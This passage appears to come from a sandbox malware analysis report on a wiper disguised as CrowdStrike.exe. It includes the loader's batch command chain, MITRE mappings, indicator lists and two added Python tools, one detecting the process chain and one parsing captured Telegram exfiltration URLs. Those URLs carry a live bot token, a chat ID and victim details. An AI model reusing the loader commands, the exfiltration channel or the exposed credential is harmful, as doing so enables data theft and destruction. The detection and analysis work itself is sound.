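    return sorted(pid for pid, f in chain_findings(events).items() if REQUIRED_CHAIN <= f)


TEMP = "C:\\Users\\user\\AppData\\Local\\Temp\\564784\\"
# Constructed from the command lines in this report; the PIDs are invented for the example.
SAMPLE_EVENTS = [
    ProcEvent(10, 1, "C:\\Users\\user\\Desktop\\CrowdStrike.exe", "CrowdStrike.exe"),
    ProcEvent(20, 10, "C:\\Windows\\SysWOW64\\cmd.exe",
              '"C:\\Windows\\System32\\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit'),
    ProcEvent(21, 20, "C:\\Windows\\SysWOW64\\tasklist.exe", "tasklist"),
    ProcEvent(22, 20, "C:\\Windows\\SysWOW64\\findstr.exe", 'findstr /I "wrsa.exe opssvc.exe"'),
    ProcEvent(23, 20, "C:\\Windows\\SysWOW64\\findstr.exe",
              'findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"'),
    ProcEvent(24, 20, "C:\\Windows\\SysWOW64\\cmd.exe", "cmd /c md 564784"),
    ProcEvent(25, 20, "C:\\Windows\\SysWOW64\\findstr.exe", 'findstr /V "locatedflatrendsoperating" Ukraine'),
    ProcEvent(26, 20, "C:\\Windows\\SysWOW64\\cmd.exe",
              "cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\\L"),
    ProcEvent(27, 20, "C:\\Windows\\SysWOW64\\timeout.exe", "timeout 15"),
    ProcEvent(28, 20, TEMP + "Champion.pif", "564784\\Champion.pif 564784\\L"),
    ProcEvent(29, 28, TEMP + "RegAsm.exe", TEMP + "RegAsm.exe"),
    # Benign control: joining two files with copy /b is one indicator, not a chain.
    ProcEvent(30, 2, "C:\\Windows\\System32\\cmd.exe", "cmd /c copy /b part1.bin + part2.bin whole.bin"),
]

if __name__ == "__main__":
    for pid in suspicious_chains(SAMPLE_EVENTS):
        print(f"loader chain under PID {pid}: {sorted(chain_findings(SAMPLE_EVENTS)[pid])}")
```

Only the batch interpreter (PID 20) is reported, because the three indicators occur among its children; the benign copy /b under PID 2 raises a single indicator and stays below the threshold. The argument-less RegAsm.exe launched from %TEMP% is recorded separately under the .pif's PID, matching the "sacrificial process with improper arguments" signature in the report.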
Source: CrowdStrike.exe, 00000000.00000003.1690884529.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, Champion.pif, 0000000A.00000000.1733040835.0000000000E96000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CrowdStrike.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qaC:\ProgramData\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qPC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qTC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^qrC:\ProgramData\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q-C:\Program Files\Windows Defender\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RegAsm.exe, 0000000F.00000002.3781125417.000000000AE11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
MITRE ATT&CK matrix: techniques mapped to observed behavior, grouped by tactic (the number in parentheses is the count of matching signatures)

Execution
• Windows Management Instrumentation (1)
• Native API (1)

Persistence
• DLL Side-Loading (1)
• Windows Service (1)

Privilege Escalation
• DLL Side-Loading (1)
• Windows Service (1)
• Process Injection (212)

Defense Evasion
• Disable or Modify Tools (1)
• Deobfuscate/Decode Files or Information (1)
• Obfuscated Files or Information (1)
• Software Packing (1)
• DLL Side-Loading (1)
• File Deletion (1)
• Masquerading (11)
• Virtualization/Sandbox Evasion (31)
• Process Injection (212)

Credential Access
• Input Capture (11)

Discovery
• File and Directory Discovery (2)
• System Information Discovery (16)
• Security Software Discovery (1)
• Process Discovery (3)
• Virtualization/Sandbox Evasion (31)
• Application Window Discovery (1)
• System Network Configuration Discovery (1)

Collection
• Archive Collected Data (1)
• Input Capture (11)
• Clipboard Data (1)

Command and Control
• Web Service (1)
• Ingress Tool Transfer (1)
• Encrypted Channel (11)
• Non-Application Layer Protocol (2)
• Application Layer Protocol (3)

Impact
• System Shutdown/Reboot (1)

No techniques are mapped under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration.
Behavior graph (ID 1477426, sample CrowdStrike.exe, start date 21/07/2024, architecture WINDOWS, score 96; bracketed numbers are the graph's per-process file/registry counts)

Sample-level DNS/IP: api.telegram.org; XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT; icanhazip.com
Sample-level signatures: Multi AV Scanner detection for submitted file; Yara detected Hatef Wiper; Sigma detected: Search for Antivirus process; 2 other signatures; Uses the Telegram API (likely for C&C communication) (api.telegram.org)

CrowdStrike.exe [41]
  dropped: C:\Users\user\AppData\Local\Temp\Job (DOS)
  signature: Found stalling execution ending in API Sleep call
  started: cmd.exe [3]
    dropped: C:\Users\user\AppData\Local\...\Champion.pif (PE32)
    signature: Drops PE files with a suspicious file extension
    started: Champion.pif [1], cmd.exe [2], conhost.exe, 7 other processes
      Champion.pif
        dropped: C:\Users\user\AppData\Local\...\RegAsm.exe (PE32)
        signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
        started: RegAsm.exe [15, 5]
          network: api.telegram.org 149.154.167.220, ports 443, 49739, 49741, TELEGRAMRU, United Kingdom; icanhazip.com 104.16.185.241, ports 49737, 49740, 49742, CLOUDFLARENETUS, United States
          dropped: C:\Users\user\...\ListOpenedFileDrv_32.sys (PE32); C:\Users\user\AppData\...\OpenFileFinder.dll (PE32)
          signature: Sample is not signed and drops a device driver

Antivirus detection, submitted file (Source: Detection, Scanner, Label)
• CrowdStrike.exe: 20%, Virustotal
• CrowdStrike.exe: 16%, ReversingLabs, Win32.Trojan.Malgent

Antivirus detection, dropped files
• C:\Users\user\AppData\Local\Temp\564784\Champion.pif: 7%, ReversingLabs
• C:\Users\user\AppData\Local\Temp\564784\Champion.pif: 3%, Virustotal
• C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe: 0%, ReversingLabs
• C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe: 0%, Virustotal
• C:\Users\user\AppData\Local\Temp\Job: 0%, ReversingLabs
• C:\Users\user\AppData\Local\Temp\Job: 0%, Virustotal
• C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys: 0%, ReversingLabs
• C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys: 3%, Virustotal
• C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll: 0%, ReversingLabs
• C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll: 0%, Virustotal

No Antivirus matches

Antivirus detection, domains
• api.telegram.org: 2%, Virustotal
• icanhazip.com: 1%, Virustotal

Antivirus detection, URLs
• http://nsis.sf.net/NSIS_ErrorError: 0%, URL Reputation, safe
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: 0%, URL Reputation, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A: 0%, Avira URL Cloud, safe
• http://www.autoitscript.com/autoit3/J: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56: 0%, Avira URL Cloud, safe
• http://www.autoitscript.com/autoit3/J: 0%, Virustotal
• https://api.telegram.org/bot: 1%, Virustotal
• http://icanhazip.com: 0%, Avira URL Cloud, safe
• http://icanhazip.com/: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A: 0%, Avira URL Cloud, safe
• https://www.autoitscript.com/autoit3/: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A: 0%, Avira URL Cloud, safe
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A: 0%, Avira URL Cloud, safe
• http://icanhazip.com: 1%, Virustotal
• http://icanhazip.com/: 1%, Virustotal
• https://www.autoitscript.com/autoit3/: 0%, Virustotal
Domains (Name: IP, Active, Malicious, Reputation)
• api.telegram.org: 149.154.167.220, active: true, malicious: true, reputation: unknown
• icanhazip.com: 104.16.185.241, active: true, malicious: false, reputation: unknown
• XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT: IP unknown (did not resolve), active: unknown, malicious: true, reputation: unknown
URLs contacted (Name: Malicious, Antivirus Detection, Reputation)
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A: malicious: false; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56: malicious: false; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A: malicious: false; Avira URL Cloud: safe; reputation: unknown
• http://icanhazip.com/: malicious: false; 1%, Virustotal; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A: malicious: false; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A: malicious: false; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A: malicious: false; Avira URL Cloud: safe; reputation: unknown

URLs found in binaries or memory (Name: Source, Malicious, Antivirus Detection, Reputation)
• http://www.autoitscript.com/autoit3/J: source: CrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmp; Champion.pif, 0000000A.00000000.1733135442.0000000000EA9000.00000002.00000001.01000000.00000005.sdmp; malicious: false; 0%, Virustotal; Avira URL Cloud: safe; reputation: unknown
• https://api.telegram.org/bot: source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp; malicious: false; 1%, Virustotal; Avira URL Cloud: safe; reputation: unknown
• http://icanhazip.com: source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp; RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; 1%, Virustotal; Avira URL Cloud: safe; reputation: unknown
• http://nsis.sf.net/NSIS_ErrorError: source: CrowdStrike.exe, 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp; CrowdStrike.exe, 00000000.00000000.1686299423.0000000000408000.00000002.00000001.01000000.00000003.sdmp; malicious: false; URL Reputation: safe; reputation: unknown
• https://www.autoitscript.com/autoit3/: source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp; malicious: false; 0%, Virustotal; Avira URL Cloud: safe; reputation: unknown
• http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: source: RegAsm.exe, 0000000F.00000002.3705258200.00000000026E1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; URL Reputation: safe; reputation: unknown
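The sendMessage URLs above are the wiper's progress reports. Because the Telegram Bot API carries the bot token and chat_id in the request itself, the captured URLs identify the operator's bot and channel, and the percent-encoded text carries the victim's public IP, machine name, per-folder file counts and timestamps. The following Python parser is an added example written for this page, not code from the sample or from Joe Sandbox; it embeds the six report URLs listed above as its constructed input. One detail it has to handle: the "App Folder" report labels its timestamp with the percent-encoded Persian word زمان ("time") instead of "Time", and the counts use U+2019 as a thousands separator.

```python
"""Parse the Telegram Bot API sendMessage URLs captured in this report.
Added example for this page; not code from the sample or from Joe Sandbox."""
import re
from urllib.parse import parse_qs, urlsplit

# Bot API paths look like /bot<numeric id>:<secret>/<method>; the token is the credential.
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)$")
# One report labels its timestamp with the Persian word for "time" instead of "Time".
FIELD_ALIASES = {"\u0632\u0645\u0627\u0646": "Time"}   # زمان
# "Key :value" lines; keys need two or more characters so "C:\|Fixed => ..." is not a field.
FIELD_RE = re.compile(r"^(?P<k>[^:=]{2,}?)\s*:\s*(?P<v>.*)$")

# The six URLs from this report (constructed input for the example, copied verbatim).
BOT = "https://api.telegram.org/bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text="
SAMPLE_URLS = [
    BOT + "Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A",
    BOT + "Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56",
    BOT + "Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A",
    BOT + "Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A",
    BOT + "Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A",
    BOT + "Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A",
]


def lookup(fields: dict, name: str):
    """Case-insensitive field lookup (the reports mix 'Undeleted' and 'undeleted')."""
    for key, value in fields.items():
        if key.lower() == name.lower():
            return value
    return None


def to_count(value):
    """'115’597' -> 115597: the reports use U+2019 (%E2%80%99) as a thousands separator."""
    if value is None:
        return None
    digits = re.sub(r"\D", "", value)
    return int(digits) if digits else None


def parse_report_url(url: str) -> dict:
    """Split one captured URL into bot credential, chat, message title and key/value fields."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL")
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        raise ValueError("no bot token in URL path")
    qs = parse_qs(parts.query, keep_blank_values=True)      # percent-decodes the message text
    text = qs.get("text", [""])[0]
    lines = [ln.strip() for ln in text.split("\r\n")]
    lines = [ln for ln in lines if ln and set(ln) != {"-"}]  # drop blanks and '-----' separators
    fields, extra = {}, []
    for ln in lines[1:]:
        fm = FIELD_RE.match(ln)
        if fm:
            key = FIELD_ALIASES.get(fm["k"].strip(), fm["k"].strip())
            fields[key] = fm["v"].strip()
        else:
            extra.append(ln)   # section headers and the disk-size summary lines
    return {
        "token": m["token"],
        "method": m["method"],
        "chat_id": qs.get("chat_id", [None])[0],
        "title": lines[0] if lines else "",
        "fields": fields,
        "extra": extra,
        "undeleted_files": to_count(lookup(fields, "Undeleted Files")),
    }


def timeline(urls):
    """(time, title, undeleted-file count) per report, ordered by the time the wiper reported."""
    reports = [parse_report_url(u) for u in urls]
    reports.sort(key=lambda r: lookup(r["fields"], "Time") or "")
    return [(lookup(r["fields"], "Time"), r["title"], r["undeleted_files"]) for r in reports]


if __name__ == "__main__":
    first = parse_report_url(SAMPLE_URLS[0])
    print("bot token:", first["token"], "chat_id:", first["chat_id"])
    for when, title, undeleted in timeline(SAMPLE_URLS):
        print(when, title, undeleted)
```

The timeline runs from "Start Wipe" at 05:14:51 to the "Windows Folder" report at 05:17:22. Note that the per-folder "Undeleted Files" counts (115’597, 107’845, 40’821, 98’718) are identical to the per-folder totals in the "Start Wipe" inventory, so in this run every enumerated file was reported back as not deleted. The token and chat_id extracted here are the parts worth blocking and reporting; the percent-encoded text is what a network detection on api.telegram.org should be decoded against.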
IPs (IP: Domain, Country, ASN, ASN Name, Malicious)
• 149.154.167.220: api.telegram.org, United Kingdom, ASN 62041, TELEGRAMRU, malicious: true
• 104.16.185.241: icanhazip.com, United States, ASN 13335, CLOUDFLARENETUS, malicious: false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1477426
Start date and time: 2024-07-21 11:13:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CrowdStrike.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@24/40@4/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 35
• Number of non-executed functions: 42
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
API Interceptor events (Time, Type: Description)
• 05:14:03, API Interceptor: 1x Sleep call for process: CrowdStrike.exe modified
• 05:14:06, API Interceptor: 1x Sleep call for process: Champion.pif modified
• 05:15:32, API Interceptor: 1479116x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | ExFAhv0nes.exe | malicious | Unknown
 | ExFAhv0nes.exe | malicious | Unknown
 | cKt8r2v7Gy.exe | malicious | Unknown
 | Final Shipping Documents.exe | malicious | Snake Keylogger, VIP Keylogger
 | VERY GOOD.exe | malicious | AgentTesla, PureLog Stealer
 | Order 8391-6.exe | malicious | GuLoader, Snake Keylogger
 | order 4500029722.exe | malicious | Snake Keylogger, VIP Keylogger
 | Enquiry-Dubai.js | malicious | PXRECVOWEIWOEI Stealer
 | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer
 | 38dJrNR8hr.js | malicious | PXRECVOWEIWOEI Stealer
104.16.185.241 | PR240614_ORDER.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | 38dJrNR8hr.js | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | CV.js | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | pp.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | P.O.exe | malicious | PXRECVOWEIWOEI Stealer | icanhazip.com/
 | ZfTfvfyShu.exe | malicious | Unknown | icanhazip.com/
 | SecuriteInfo.com.Trojan.AutoIt.1410.29083.29061.exe | malicious | Stealerium | icanhazip.com/
